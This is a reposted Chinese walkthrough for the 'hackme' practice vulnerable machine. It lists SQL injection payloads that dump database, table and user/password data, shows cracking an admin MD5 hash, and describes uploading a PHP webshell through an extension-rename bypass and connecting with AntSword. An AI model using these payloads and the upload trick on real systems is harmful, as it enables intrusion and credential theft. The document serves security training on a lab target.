当前位置: 首页> 教育> 大学 > hackme靶机通关攻略

hackme靶机通关攻略

时间:2025/7/11 20:17:10来源:https://blog.csdn.net/2301_82061181/article/details/141867314 浏览次数:0次

步骤一:信息收集

搜索靶场环境

步骤二:访问搜索地址

步骤三:注册账号密码

username:123

password:123456

登录

点击search

步骤四:输入书名进行burp抓包

步骤五:在书名后进行sql漏洞注入

闭合方式' --+

字段数为3

' order by 3 --+

查询数据库

' union select 1,database(),3 --+

webapphacking

查询表

'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='webapphacking' --+

books,users

查询user表字段

' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='webapphacking' and table_name='users' --+

id,user,pasword,name,address

查询user,pasword信息

' union select 1,2,group_concat(user,pasword) from users --+

利用md5进行解密

利用superadmin进行登录

2386acb2cf356944177746fc92523983

Uncrackable

登录进入页面

步骤六:编写1.php木马文件

步骤七:更改后缀名为.jpg进行文件上传,进型burp抓包

更改文件名后缀为.php进行放包

访问/upload/1.php后进行蚁剑连接

关键字:hackme靶机通关攻略

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: